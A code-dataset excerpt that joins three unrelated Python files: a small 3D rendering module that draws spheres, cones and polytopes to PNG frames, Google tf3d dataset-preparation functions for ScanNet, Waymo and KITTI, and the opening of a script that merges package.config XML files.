# def render(self, cvs):
# GItem.render(self, cvs)
class Light(object):
def __init__(self, position, color):
assert position.shape == (3, 1)
self.position = position
self.color = color
class View(object):
def __init__(self, _width=640, _height=480):
#global width, height, viewport, proj, model
scale = 0.05 # XXX 1./SCALE_CM_TO_POINT
width, height = scale*_width, scale*_height
self.viewport = (0., 0., width, height)
self.proj = Mat.identity(4) # Projection matrix
self.model = Mat.identity(4) # ModelView matrix
self.stack = []
self.gitems = []
self.lights = []
def perspective(self):
#global proj
width, height = self.viewport[2:]
M = Mat.perspective(45., width/height, 0.1, 100.)
self.proj = M * self.proj
def translate(self, x, y, z): # XXX use Mat
#global model
M = Mat.translate(x, y, z)
self.model = self.model*M
def lookat(self, eye, center, up):
#global model
M = Mat.lookat(eye, center, up)
self.model = self.model*M
def rotate(self, angle, x, y, z):
M = Mat.rotate(angle, x, y, z)
self.model = self.model*M
def scale(self, sx, sy, sz):
M = Mat.scale(sx, sy, sz)
self.model = self.model*M
def save(self):
model = self.model
self.stack.append(model.copy())
def restore(self):
if not self.stack:
return
self.model = self.stack.pop()
# ------------------------------------------------
def trafo_view(self, point):
assert isinstance(point, Mat), type(point)
assert point.shape == (3, 1), repr(point)
x, y, z = point
v = [x, y, z, 1.]
v = self.model * v
assert abs(v[3]-1.) < EPSILON, "model matrix should not do this.."
v = v[:3]
return v
def trafo_view_distance(self, point):
assert isinstance(point, Mat), type(point)
assert point.shape == (3, 1), repr(point)
x, y, z = point
v = [x, y, z, 0.]
v = self.model * v
v = v[:3]
return v
def trafo_camera(self, point):
assert point.shape == (3, 1)
x, y, z = point
v = self.proj * [x, y, z, 1.]
x, y, z, w = v
#return x/w, y/w, z/w
return x, y, z
def trafo_canvas(self, point):
x, y, z = point
v = self.proj * [x, y, z, 1.]
x, y, z, w = v
x, y = x/w, y/w
x0, y0, width, height = self.viewport
w2, h2 = width/2, height/2
x = x0 + w2 + x*w2
y = y0 + h2 + y*h2
return x, y
def get_depth(self, gitem):
v = gitem.center
x, y, z = self.trafo_camera(v)
return -z
# -----------------------------------------
# class Scene ?
def add_gitem(self, face):
self.gitems.append(face)
def add_poly(self, verts, *args, **kw):
verts = [self.trafo_view(v) for v in verts]
gitem = GPoly(verts, *args, **kw)
self.add_gitem(gitem)
def add_mesh(self, verts, normals, *args, **kw):
verts = [self.trafo_view(v) for v in verts]
normals = [self.trafo_view_distance(n) for n in normals]
gitem = GMesh(verts, normals, *args, **kw)
self.add_gitem(gitem)
def add_ball(self, point, radius, *args, **kw):
point = self.trafo_view(point)
gitem = Ball(point, radius, *args, **kw)
self.add_gitem(gitem)
def add_light(self, position, color):
position = Mat.promote(position)
position = self.trafo_view(position)
light = Light(position, color)
self.lights.append(light)
def prepare_canvas(self, bg=color.rgb.black, clip=True):
cvs = canvas.canvas()
cvs.append(style.linewidth.THick)
x0, y0, width, height = self.viewport
p = mkpath([(x0, y0), (x0+width, y0), (x0+width, y0+height), (x0, y0+height)])
cvs.fill(p, [bg])
if clip:
cvs.clip(p)
cvs.append(style.linejoin.bevel)
return cvs
# def XXXilluminate(self, gitem):
# light = self.lights[0]
# v = (light.position - gitem.center).normalized()
# #v = Mat([0., 0., 1.]).normalized()
# x = v.dot(gitem.normal)
# #print(x)
# assert x <= 1+EPSILON, x
# x = max(0.3, x)
# fill = gitem.fill
# stroke = gitem.stroke
# if fill is not None:
# r, g, b, a = fill
# fill = (x*r, x*g, x*b, a)
# if stroke is not None:
# r, g, b, a = stroke
# stroke = (x*r, x*g, x*b, a)
# return fill, stroke
def illuminate(self, vert, normal, color):
light = self.lights[0]
v = (light.position - vert).normalized()
x = v.dot(normal)
assert x <= 1+EPSILON, x
x = max(0.3, x) # XXX diffuse
r, g, b, a = color
color = (x*r, x*g, x*b, a)
return color
def render(self, *args, **kw):
cvs = self.prepare_canvas(*args, **kw)
gitems = list(self.gitems)
# XXX sorting by depth does not always work...
# XXX try subdividing your GItem's ?
gitems.sort(key = self.get_depth)
for gitem in gitems:
gitem.render(self, cvs)
return cvs
# ----------------------------------------------------------------------
def make_sphere(view, radius, slices=8, stacks=8, fill=color.rgb.white):
z = -radius
dz = 2*radius / stacks
dtheta = 2*pi/slices
dphi = pi/stacks
for i in range(stacks):
phi0 = dphi*i
phi1 = dphi*(i+1)
r0 = radius*sin(phi0)
r1 = radius*sin(phi1)
z0 = -radius*cos(phi0)
z1 = -radius*cos(phi1)
for j in range(slices):
theta0 = j * dtheta
theta1 = (j+1) * dtheta
x0, y0 = r0*cos(theta0), r0*sin(theta0)
x1, y1 = r1*cos(theta0), r1*sin(theta0)
x2, y2 = r1*cos(theta1), r1*sin(theta1)
x3, y3 = r0*cos(theta1), r0*sin(theta1)
verts = [
Mat([x3, y3, z0]),
Mat([x2, y2, z1]),
Mat([x1, y1, z1]),
Mat([x0, y0, z0]),
]
if i==0:
verts.pop(0)
elif i==stacks-1:
verts.pop(1)
normals = [v.normalized() for v in verts]
view.add_mesh(verts, normals, fill)
def make_cylinder(view, radius0, radius1, height, slices=8, fill=color.rgb.white):
assert radius0 > EPSILON
assert radius1 > EPSILON
assert height > EPSILON
dtheta = 2*pi/slices
r0 = radius0
r1 = radius1
z = Mat([0, 0, height])
for j in range(slices):
theta0 = j * dtheta
theta1 = (j+1) * dtheta
v0 = Mat([cos(theta0), sin(theta0), 0.])
v1 = Mat([cos(theta1), sin(theta1), 0.])
dv0 = Mat([-sin(theta0), cos(theta0), 0.])
dv1 = Mat([-sin(theta1), cos(theta1), 0.])
verts = [r0*v1, r1*v1 + z, r1*v0 + z, r0*v0]
n0 = dv1.cross(verts[1]-verts[0]).normalized()
n1 = n0
n2 = dv0.cross(verts[2]-verts[3]).normalized()
n3 = n2
normals = [n0, n1, n2, n3]
view.add_mesh(verts, normals, fill)
def make_cone(view, radius, height, slices=8, fill=color.rgb.white):
assert radius > EPSILON
assert height > EPSILON
dtheta = 2*pi/slices
r = radius
z = Mat([0, 0, height])
for j in range(slices):
theta0 = j * dtheta
theta1 = (j+1) * dtheta
v0 = Mat([cos(theta0), sin(theta0), 0.])
v1 = Mat([cos(theta1), sin(theta1), 0.])
dv0 = Mat([-sin(theta0), cos(theta0), 0.])
dv1 = Mat([-sin(theta1), cos(theta1), 0.])
verts = [r*v1, z, r*v0]
n0 = dv1.cross(verts[1]-verts[0]).normalized()
n2 = dv0.cross(verts[1]-verts[2]).normalized()
n1 = (0.5*(n0+n2)).normalized()
normals = [n0, n1, n2]
view.add_mesh(verts, normals, fill)
def make_torus(view, inner, outer, slices=16, stacks=16, fill=color.rgb.white):
dphi = 2*pi/stacks
dtheta = 2*pi/slices
for i in range(stacks):
phi0 = dphi*i
phi1 = dphi*(i+1)
u0 = Mat([cos(phi0), sin(phi0), 0.])
v0 = Mat([0., 0., 1.])
u1 = Mat([cos(phi1), sin(phi1), 0.])
v1 = Mat([0., 0., 1.])
for j in range(slices):
theta0 = dtheta*j
theta1 = dtheta*(j+1)
n0 = sin(theta0)*u0 + cos(theta0)*v0
n1 = sin(theta0)*u1 + cos(theta0)*v1
n2 = sin(theta1)*u1 + cos(theta1)*v1
n3 = sin(theta1)*u0 + cos(theta1)*v0
x0 = outer*u0 + inner*n0
x1 = outer*u1 + inner*n1
x2 = outer*u1 + inner*n2
x3 = outer*u0 + inner*n3
verts = [x3, x2, x1, x0]
normals = [n3, n2, n1, n0]
view.add_mesh(verts, normals, fill)
# ----------------------------------------------------------------------
def main():
global cvs
from bruhat import platonic
polytopes = [
platonic.make_tetrahedron(),
platonic.make_cube(),
platonic.make_octahedron(),
platonic.make_dodecahedron(),
platonic.make_icosahedron()]
polytopes = [
[[Mat(list(v)) for v in face] for face in polygon]
for polygon in polytopes]
from bruhat.argv import argv
frames = argv.get("frames", 1)
R = 6.0
y = 2.
theta = 0.
for frame in range(frames):
view = View()
view.perspective()
theta += 0.004*pi
x, z = R*sin(theta), R*cos(theta)
#R -= 0.01
#y += 0.01
view.lookat([x, y, z], [0., 0, 0], [0, 1, 0]) # eye, center, up
#view.lookat([x, 0., z], [0., 0, 0], [0, 1, 0]) # eye, center, up
point = [x, y, z]
view.add_light(point, (1., 1., 1., 1.))
#stroke = (0.4, 0.4, 0.4, 1.)
stroke = None
fills = [
(0.9, 0.8, 0., 1.0),
(0.9, 0.8, 0., 0.8),
(0.6, 0.2, 0.4, 0.8),
(0.2, 0.2, 0.4, 0.8),
(0.8, 0.6, 0.4, 0.8),
(0.0, 0.6, 0.4, 0.8),
]
if 1:
#view.rotate(frame, 1, 0, 0)
#view.rotate(0.1*frame, 0, 1, 0)
fill = fills[0]
#make_torus(view, 0.5, 2., 32, 32, fill)
#view.scale(2, 1, 1)
#make_sphere(view, 1., 16, 12, fill)
view.translate(0, -1, 0)
view.rotate(-90, 1, 0, 0)
#make_cylinder(view, 0.5, 1.0, 2., 16, fill)
make_cone(view, 0.5, 1., 16, fill)
elif 1:
view.translate(-4., 0, 2)
for idx, polygon in enumerate(polytopes):
fill = fills[idx]
view.save()
view.rotate(-frame*(idx+1), 1, 1, 0)
for verts in polygon:
view.add_poly(verts, fill, stroke)
view.restore()
view.translate(+5, 0, 0)
view.rotate(360./5, 0, 1, 0)
bg = color.rgb(0.2, 0.2, 0.2, 1.0)
cvs = view.render(bg=bg)
cvs.writePNGfile("frames/%.4d.png"%frame)
if frame == 0:
cvs.writePDFfile("frames/%.4d.pdf"%frame)
print(".", end="", flush=True)
print("OK")
if __name__ == "__main__":
main()
| StarcoderdataPython |
146911 | # coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Functions for preparing data to be compatible with object detection pipeline.
Functions to prepare Waymo, scannet and kitti datasets.
"""
import enum
import gin
import gin.tf
import tensorflow as tf
import tensorflow_datasets as tfds
from tf3d import standard_fields
# TODO(alirezafathi): Remove internal mark when dataset files are moved to tf3d.
from tf3d.datasets.specs import waymo_frames
from tf3d.utils import projections
class ObjectDifficulty(enum.IntEnum):
SUPER_HARD = 0
HARD = 1
MODERATE = 2
EASY = 3
def _random_string_generator(num_numbers=5, max_number_value=100000):
string_tensors = []
for _ in range(num_numbers):
random_number = tf.random.uniform([],
minval=0,
maxval=max_number_value,
dtype=tf.int32)
string_tensors.append(tf.strings.as_string(random_number))
return tf.strings.join(string_tensors)
@gin.configurable
def prepare_scannet_scene_dataset(inputs, valid_object_classes=None):
"""Maps the fields from loaded input to standard fields.
Args:
inputs: A dictionary of input tensors.
valid_object_classes: List of valid object classes. if None, it is ignored.
Returns:
A dictionary of input tensors with standard field names.
"""
prepared_inputs = {}
if 'mesh/vertices/positions' in inputs:
prepared_inputs[standard_fields.InputDataFields
.point_positions] = inputs['mesh/vertices/positions']
if 'mesh/vertices/normals' in inputs:
prepared_inputs[standard_fields.InputDataFields
.point_normals] = inputs['mesh/vertices/normals']
prepared_inputs[standard_fields.InputDataFields.point_normals] = tf.where(
tf.math.is_nan(
prepared_inputs[standard_fields.InputDataFields.point_normals]),
tf.zeros_like(
prepared_inputs[standard_fields.InputDataFields.point_normals]),
prepared_inputs[standard_fields.InputDataFields.point_normals])
if 'mesh/vertices/colors' in inputs:
prepared_inputs[standard_fields.InputDataFields
.point_colors] = inputs['mesh/vertices/colors'][:, 0:3]
prepared_inputs[standard_fields.InputDataFields.point_colors] = tf.cast(
prepared_inputs[standard_fields.InputDataFields.point_colors],
dtype=tf.float32)
prepared_inputs[standard_fields.InputDataFields.point_colors] *= (2.0 /
255.0)
prepared_inputs[standard_fields.InputDataFields.point_colors] -= 1.0
if 'scene_name' in inputs:
prepared_inputs[standard_fields.InputDataFields
.camera_image_name] = inputs['scene_name']
if 'mesh/vertices/semantic_labels' in inputs:
prepared_inputs[
standard_fields.InputDataFields
.object_class_points] = inputs['mesh/vertices/semantic_labels']
if 'mesh/vertices/instance_labels' in inputs:
prepared_inputs[
standard_fields.InputDataFields.object_instance_id_points] = tf.reshape(
inputs['mesh/vertices/instance_labels'], [-1])
if valid_object_classes is not None:
valid_objects_mask = tf.cast(
tf.zeros_like(
prepared_inputs[
standard_fields.InputDataFields.object_class_points],
dtype=tf.int32),
dtype=tf.bool)
for object_class in valid_object_classes:
valid_objects_mask = tf.logical_or(
valid_objects_mask,
tf.equal(
prepared_inputs[
standard_fields.InputDataFields.object_class_points],
object_class))
valid_objects_mask = tf.cast(
valid_objects_mask,
dtype=prepared_inputs[
standard_fields.InputDataFields.object_class_points].dtype)
prepared_inputs[standard_fields.InputDataFields
.object_class_points] *= valid_objects_mask
return prepared_inputs
@gin.configurable
def prepare_scannet_frame_dataset(inputs,
min_pixel_depth=0.3,
max_pixel_depth=6.0,
valid_object_classes=None):
"""Maps the fields from loaded input to standard fields.
Args:
inputs: A dictionary of input tensors.
min_pixel_depth: Pixels with depth values less than this are pruned.
max_pixel_depth: Pixels with depth values more than this are pruned.
valid_object_classes: List of valid object classes. if None, it is ignored.
Returns:
A dictionary of input tensors with standard field names.
"""
prepared_inputs = {}
if 'cameras/rgbd_camera/intrinsics/K' not in inputs:
raise ValueError('Intrinsic matrix is missing.')
if 'cameras/rgbd_camera/extrinsics/R' not in inputs:
raise ValueError('Extrinsic rotation matrix is missing.')
if 'cameras/rgbd_camera/extrinsics/t' not in inputs:
raise ValueError('Extrinsics translation is missing.')
if 'cameras/rgbd_camera/depth_image' not in inputs:
raise ValueError('Depth image is missing.')
if 'cameras/rgbd_camera/color_image' not in inputs:
raise ValueError('Color image is missing.')
if 'frame_name' in inputs:
prepared_inputs[standard_fields.InputDataFields
.camera_image_name] = inputs['frame_name']
camera_intrinsics = inputs['cameras/rgbd_camera/intrinsics/K']
depth_image = inputs['cameras/rgbd_camera/depth_image']
image_height = tf.shape(depth_image)[0]
image_width = tf.shape(depth_image)[1]
x, y = tf.meshgrid(
tf.range(image_width), tf.range(image_height), indexing='xy')
x = tf.reshape(tf.cast(x, dtype=tf.float32) + 0.5, [-1, 1])
y = tf.reshape(tf.cast(y, dtype=tf.float32) + 0.5, [-1, 1])
point_positions = projections.image_frame_to_camera_frame(
image_frame=tf.concat([x, y], axis=1),
camera_intrinsics=camera_intrinsics)
rotate_world_to_camera = inputs['cameras/rgbd_camera/extrinsics/R']
translate_world_to_camera = inputs['cameras/rgbd_camera/extrinsics/t']
point_positions = projections.to_world_frame(
camera_frame_points=point_positions,
rotate_world_to_camera=rotate_world_to_camera,
translate_world_to_camera=translate_world_to_camera)
prepared_inputs[standard_fields.InputDataFields
.point_positions] = point_positions * tf.reshape(
depth_image, [-1, 1])
depth_values = tf.reshape(depth_image, [-1])
valid_depth_mask = tf.logical_and(
tf.greater_equal(depth_values, min_pixel_depth),
tf.less_equal(depth_values, max_pixel_depth))
prepared_inputs[standard_fields.InputDataFields.point_colors] = tf.reshape(
tf.cast(inputs['cameras/rgbd_camera/color_image'], dtype=tf.float32),
[-1, 3])
prepared_inputs[standard_fields.InputDataFields.point_colors] *= (2.0 / 255.0)
prepared_inputs[standard_fields.InputDataFields.point_colors] -= 1.0
prepared_inputs[
standard_fields.InputDataFields.point_positions] = tf.boolean_mask(
prepared_inputs[standard_fields.InputDataFields.point_positions],
valid_depth_mask)
prepared_inputs[
standard_fields.InputDataFields.point_colors] = tf.boolean_mask(
prepared_inputs[standard_fields.InputDataFields.point_colors],
valid_depth_mask)
if 'cameras/rgbd_camera/semantic_image' in inputs:
prepared_inputs[
standard_fields.InputDataFields.object_class_points] = tf.cast(
tf.reshape(inputs['cameras/rgbd_camera/semantic_image'], [-1, 1]),
dtype=tf.int32)
prepared_inputs[
standard_fields.InputDataFields.object_class_points] = tf.boolean_mask(
prepared_inputs[
standard_fields.InputDataFields.object_class_points],
valid_depth_mask)
if 'cameras/rgbd_camera/instance_image' in inputs:
prepared_inputs[
standard_fields.InputDataFields.object_instance_id_points] = tf.cast(
tf.reshape(inputs['cameras/rgbd_camera/instance_image'], [-1]),
dtype=tf.int32)
prepared_inputs[standard_fields.InputDataFields
.object_instance_id_points] = tf.boolean_mask(
prepared_inputs[standard_fields.InputDataFields
.object_instance_id_points],
valid_depth_mask)
if valid_object_classes is not None:
valid_objects_mask = tf.cast(
tf.zeros_like(
prepared_inputs[
standard_fields.InputDataFields.object_class_points],
dtype=tf.int32),
dtype=tf.bool)
for object_class in valid_object_classes:
valid_objects_mask = tf.logical_or(
valid_objects_mask,
tf.equal(
prepared_inputs[
standard_fields.InputDataFields.object_class_points],
object_class))
valid_objects_mask = tf.cast(
valid_objects_mask,
dtype=prepared_inputs[
standard_fields.InputDataFields.object_class_points].dtype)
prepared_inputs[standard_fields.InputDataFields
.object_class_points] *= valid_objects_mask
return prepared_inputs
@gin.configurable
def prepare_waymo_open_dataset(inputs,
valid_object_classes=None,
max_object_distance_from_source=74.88):
"""Maps the fields from loaded input to standard fields.
Args:
inputs: A dictionary of input tensors.
valid_object_classes: List of valid object classes. if None, it is ignored.
max_object_distance_from_source: Maximum distance of objects from source. It
will be ignored if None.
Returns:
A dictionary of input tensors with standard field names.
"""
prepared_inputs = {}
if standard_fields.InputDataFields.point_positions in inputs:
prepared_inputs[standard_fields.InputDataFields.point_positions] = inputs[
standard_fields.InputDataFields.point_positions]
if standard_fields.InputDataFields.point_intensities in inputs:
prepared_inputs[standard_fields.InputDataFields.point_intensities] = inputs[
standard_fields.InputDataFields.point_intensities]
if standard_fields.InputDataFields.point_elongations in inputs:
prepared_inputs[standard_fields.InputDataFields.point_elongations] = inputs[
standard_fields.InputDataFields.point_elongations]
if standard_fields.InputDataFields.point_normals in inputs:
prepared_inputs[standard_fields.InputDataFields.point_normals] = inputs[
standard_fields.InputDataFields.point_normals]
if 'cameras/front/intrinsics/K' in inputs:
prepared_inputs[standard_fields.InputDataFields
.camera_intrinsics] = inputs['cameras/front/intrinsics/K']
if 'cameras/front/extrinsics/R' in inputs:
prepared_inputs[
standard_fields.InputDataFields
.camera_rotation_matrix] = inputs['cameras/front/extrinsics/R']
if 'cameras/front/extrinsics/t' in inputs:
prepared_inputs[standard_fields.InputDataFields
.camera_translation] = inputs['cameras/front/extrinsics/t']
if 'cameras/front/image' in inputs:
prepared_inputs[standard_fields.InputDataFields
.camera_image] = inputs['cameras/front/image']
prepared_inputs[standard_fields.InputDataFields
.camera_raw_image] = inputs['cameras/front/image']
prepared_inputs[standard_fields.InputDataFields
.camera_original_image] = inputs['cameras/front/image']
if 'scene_name' in inputs and 'frame_name' in inputs:
prepared_inputs[
standard_fields.InputDataFields.camera_image_name] = tf.strings.join(
[inputs['scene_name'], inputs['frame_name']], separator='_')
if 'objects/pose/R' in inputs:
prepared_inputs[standard_fields.InputDataFields
.objects_rotation_matrix] = inputs['objects/pose/R']
if 'objects/pose/t' in inputs:
prepared_inputs[standard_fields.InputDataFields
.objects_center] = inputs['objects/pose/t']
if 'objects/shape/dimension' in inputs:
prepared_inputs[
standard_fields.InputDataFields.objects_length] = tf.reshape(
inputs['objects/shape/dimension'][:, 0], [-1, 1])
prepared_inputs[standard_fields.InputDataFields.objects_width] = tf.reshape(
inputs['objects/shape/dimension'][:, 1], [-1, 1])
prepared_inputs[
standard_fields.InputDataFields.objects_height] = tf.reshape(
inputs['objects/shape/dimension'][:, 2], [-1, 1])
if 'objects/category/label' in inputs:
prepared_inputs[standard_fields.InputDataFields.objects_class] = tf.reshape(
inputs['objects/category/label'], [-1, 1])
if valid_object_classes is not None:
valid_objects_mask = tf.cast(
tf.zeros_like(
prepared_inputs[standard_fields.InputDataFields.objects_class],
dtype=tf.int32),
dtype=tf.bool)
for object_class in valid_object_classes:
valid_objects_mask = tf.logical_or(
valid_objects_mask,
tf.equal(
prepared_inputs[standard_fields.InputDataFields.objects_class],
object_class))
valid_objects_mask = tf.reshape(valid_objects_mask, [-1])
for key in standard_fields.get_input_object_fields():
if key in prepared_inputs:
prepared_inputs[key] = tf.boolean_mask(prepared_inputs[key],
valid_objects_mask)
if max_object_distance_from_source is not None:
if standard_fields.InputDataFields.objects_center in prepared_inputs:
object_distances = tf.norm(
prepared_inputs[standard_fields.InputDataFields.objects_center][:,
0:2],
axis=1)
valid_mask = tf.less(object_distances, max_object_distance_from_source)
for key in standard_fields.get_input_object_fields():
if key in prepared_inputs:
prepared_inputs[key] = tf.boolean_mask(prepared_inputs[key],
valid_mask)
return prepared_inputs
@gin.configurable
def prepare_kitti_dataset(inputs, valid_object_classes=None):
"""Maps the fields from loaded input to standard fields.
Args:
inputs: A dictionary of input tensors.
valid_object_classes: List of valid object classes. if None, it is ignored.
Returns:
A dictionary of input tensors with standard field names.
"""
prepared_inputs = {}
prepared_inputs[standard_fields.InputDataFields.point_positions] = inputs[
standard_fields.InputDataFields.point_positions]
prepared_inputs[standard_fields.InputDataFields.point_intensities] = inputs[
standard_fields.InputDataFields.point_intensities]
prepared_inputs[standard_fields.InputDataFields
.camera_intrinsics] = inputs['cameras/cam02/intrinsics/K']
prepared_inputs[standard_fields.InputDataFields.
camera_rotation_matrix] = inputs['cameras/cam02/extrinsics/R']
prepared_inputs[standard_fields.InputDataFields
.camera_translation] = inputs['cameras/cam02/extrinsics/t']
prepared_inputs[standard_fields.InputDataFields
.camera_image] = inputs['cameras/cam02/image']
prepared_inputs[standard_fields.InputDataFields
.camera_raw_image] = inputs['cameras/cam02/image']
prepared_inputs[standard_fields.InputDataFields
.camera_original_image] = inputs['cameras/cam02/image']
if 'scene_name' in inputs and 'frame_name' in inputs:
prepared_inputs[
standard_fields.InputDataFields.camera_image_name] = tf.strings.join(
[inputs['scene_name'], inputs['frame_name']], separator='_')
if 'objects/pose/R' in inputs:
prepared_inputs[standard_fields.InputDataFields
.objects_rotation_matrix] = inputs['objects/pose/R']
if 'objects/pose/t' in inputs:
prepared_inputs[standard_fields.InputDataFields
.objects_center] = inputs['objects/pose/t']
if 'objects/shape/dimension' in inputs:
prepared_inputs[
standard_fields.InputDataFields.objects_length] = tf.reshape(
inputs['objects/shape/dimension'][:, 0], [-1, 1])
prepared_inputs[standard_fields.InputDataFields.objects_width] = tf.reshape(
inputs['objects/shape/dimension'][:, 1], [-1, 1])
prepared_inputs[
standard_fields.InputDataFields.objects_height] = tf.reshape(
inputs['objects/shape/dimension'][:, 2], [-1, 1])
if 'objects/category/label' in inputs:
prepared_inputs[standard_fields.InputDataFields.objects_class] = tf.reshape(
inputs['objects/category/label'], [-1, 1])
if valid_object_classes is not None:
valid_objects_mask = tf.cast(
tf.zeros_like(
prepared_inputs[standard_fields.InputDataFields.objects_class],
dtype=tf.int32),
dtype=tf.bool)
for object_class in valid_object_classes:
valid_objects_mask = tf.logical_or(
valid_objects_mask,
tf.equal(
prepared_inputs[standard_fields.InputDataFields.objects_class],
object_class))
valid_objects_mask = tf.reshape(valid_objects_mask, [-1])
for key in standard_fields.get_input_object_fields():
if key in prepared_inputs:
prepared_inputs[key] = tf.boolean_mask(prepared_inputs[key],
valid_objects_mask)
return prepared_inputs
@gin.configurable
def prepare_proxy_dataset(inputs):
"""Maps the fields from loaded input to standard fields.
Args:
inputs: A dictionary of input tensors.
Returns:
A dictionary of input tensors with standard field names.
"""
prepared_inputs = {}
# Points
prepared_inputs[standard_fields.InputDataFields.point_positions] = inputs[
standard_fields.InputDataFields.point_positions]
prepared_inputs[standard_fields.InputDataFields.point_intensities] = inputs[
standard_fields.InputDataFields.point_intensities]
# Camera
prepared_inputs[
standard_fields.InputDataFields.camera_intrinsics] = tf.reshape(
inputs['camera_intrinsics'], [3, 3])
prepared_inputs[
standard_fields.InputDataFields.camera_rotation_matrix] = tf.reshape(
inputs['camera_rotation_matrix'], [3, 3])
prepared_inputs[
standard_fields.InputDataFields.camera_translation] = tf.reshape(
inputs['camera_translation'], [3])
prepared_inputs[
standard_fields.InputDataFields.camera_image] = inputs['image']
prepared_inputs[
standard_fields.InputDataFields.camera_raw_image] = inputs['image']
prepared_inputs[
standard_fields.InputDataFields.camera_original_image] = inputs['image']
prepared_inputs[standard_fields.InputDataFields
.camera_image_name] = _random_string_generator()
# objects pose
prepared_inputs[
standard_fields.InputDataFields.objects_rotation_matrix] = tf.reshape(
inputs['objects_rotation'], [-1, 3, 3])
prepared_inputs[standard_fields.InputDataFields.objects_center] = tf.reshape(
inputs['objects_center'], [-1, 3])
# objects size
prepared_inputs[standard_fields.InputDataFields.objects_length] = tf.reshape(
inputs['objects_length'], [-1, 1])
prepared_inputs[standard_fields.InputDataFields.objects_width] = tf.reshape(
inputs['objects_width'], [-1, 1])
prepared_inputs[standard_fields.InputDataFields.objects_height] = tf.reshape(
inputs['objects_height'], [-1, 1])
# labels
prepared_inputs[standard_fields.InputDataFields.objects_class] = tf.reshape(
inputs['objects_class'], [-1, 1])
return prepared_inputs
def compute_kitti_difficulty(boxes, occlusions, truncations, image_height):
"""Computes box difficulty as Hard(1), Moderate(2), Easy(3) or 0 (Super hard).
Easy: height >=40 Px, occlusion <= 0, truncation <= 0.15
Moderate: height >=25 Px, occlusion <= 1, truncation <= 0.30
Hard: height >=25 Px, occlusion <= 2, truncation <= 0.50
Note that 'Hard' box is also 'Moderate' and 'Easy'.
Returns a (N, 1) tensor containing object difficulty with following labelmap:
0: SuperHard
1: Hard
2: Moderate
3: Easy
TODO(abhijitkundu): Since difficulty level is very specific to kitti, this
function should be in kitti evaluation rather than detection preprocessor.
Args:
boxes: (N, 4) tensor of 2d boxes with [ymin, xmin, ymax, xmax] each row.
occlusions: (N, 1) tensor containing box occlusion level
truncations: (N, 1) tensor containing box truncation level
image_height: Image height.
Returns:
A (N, 1) int32 tensor containing per box difficulty labels with 0 (SuperHard),
1 (Hard), 2 (Moderate) and 3 (Easy).
"""
# box heights in pixels
heights = tf.reshape((boxes[:, 2] - boxes[:, 0]), [-1, 1]) * tf.cast(
image_height, dtype=tf.float32)
# compute binary masks for each difficulty level
is_easy = (heights >= 40.0) & (occlusions <= 0) & (truncations <= 0.15)
is_moderate = (heights >= 25.0) & (occlusions <= 1) & (truncations <= 0.30)
is_hard = (heights >= 25.0) & (occlusions <= 2) & (truncations <= 0.50)
# set difficulty map
difficulty = tf.maximum(
tf.maximum(
tf.cast(is_hard, dtype=tf.int32) * ObjectDifficulty.HARD,
tf.cast(is_moderate, dtype=tf.int32) * ObjectDifficulty.MODERATE),
tf.cast(is_easy, dtype=tf.int32) * ObjectDifficulty.EASY)
return difficulty
def get_waymo_per_frame_with_prediction_feature_spec(
num_object_classes,
encoded_features_dimension,
include_encoded_features=True):
"""Returns a tfds feature spec with regular per frame entries and predictions.
Args:
num_object_classes: Number of object classes.
encoded_features_dimension: Encoded features dimension.
include_encoded_features: If True, it will include encoded features.
Otherwise, it will not include them.
Returns:
A tfds feature spec.
"""
prediction_feature_dict = {
standard_fields.DetectionResultFields.object_rotation_matrix_points:
tfds.features.Tensor(shape=(None, 3, 3), dtype=tf.float32),
standard_fields.DetectionResultFields.object_length_points:
tfds.features.Tensor(shape=(None, 1), dtype=tf.float32),
standard_fields.DetectionResultFields.object_height_points:
tfds.features.Tensor(shape=(None, 1), dtype=tf.float32),
standard_fields.DetectionResultFields.object_width_points:
tfds.features.Tensor(shape=(None, 1), dtype=tf.float32),
standard_fields.DetectionResultFields.object_center_points:
tfds.features.Tensor(shape=(None, 3), dtype=tf.float32),
standard_fields.DetectionResultFields.object_semantic_points:
tfds.features.Tensor(
shape=(None, num_object_classes), dtype=tf.float32),
standard_fields.DetectionResultFields.objects_rotation_matrix:
tfds.features.Tensor(shape=(None, 3, 3), dtype=tf.float32),
standard_fields.DetectionResultFields.objects_length:
tfds.features.Tensor(shape=(None, 1), dtype=tf.float32),
standard_fields.DetectionResultFields.objects_height:
tfds.features.Tensor(shape=(None, 1), dtype=tf.float32),
standard_fields.DetectionResultFields.objects_width:
tfds.features.Tensor(shape=(None, 1), dtype=tf.float32),
standard_fields.DetectionResultFields.objects_center:
tfds.features.Tensor(shape=(None, 3), dtype=tf.float32),
standard_fields.DetectionResultFields.objects_class:
tfds.features.Tensor(shape=(None, 1), dtype=tf.float32),
standard_fields.DetectionResultFields.objects_score:
tfds.features.Tensor(shape=(None, 1), dtype=tf.float32),
}
if include_encoded_features:
prediction_feature_dict[standard_fields.DetectionResultFields
.encoded_features_points] = tfds.features.Tensor(
shape=(None, encoded_features_dimension),
dtype=tf.float32)
prediction_feature_dict[standard_fields.DetectionResultFields
.objects_encoded_features] = tfds.features.Tensor(
shape=(None, encoded_features_dimension),
dtype=tf.float32)
prediction_feature_spec = tfds.features.FeaturesDict(prediction_feature_dict)
output_feature_spec_dict = {
k: v for k, v in waymo_frames.FRAME_FEATURE_SPEC.items()
}
output_feature_spec_dict['predictions'] = prediction_feature_spec
return tfds.features.FeaturesDict(output_feature_spec_dict)
| StarcoderdataPython |
1784148 | from xml.etree.cElementTree import parse, Element, ElementTree, dump
from os import walk
from os.path import join
from optparse import OptionParser
description = "Update the master package.config from individual project ones."
command_group = "Developer tools"
# Snippet used from the ElementTree documentation.
# Tidy up the indentation of XML elements.
def indent(elem, level=0):
i = "\n" + level*" "
if len(elem):
if not elem.text or not elem.text.strip():
elem.text = i + " "
if not elem.tail or not elem.tail.strip():
elem.tail = i
for elem in elem:
indent(elem, level+1)
if not elem.tail or not elem.tail.strip():
elem.tail = i
else:
if level and (not elem.tail or not elem.tail.strip()):
elem.tail = i
def parse_args():
usage = (
"\n"+
" %prog\n"+
"\n"+
"Update the master projectdata/packages.config from all the individual project\n"+
"package.config files throught the src/ directory.")
parser = OptionParser(usage=usage)
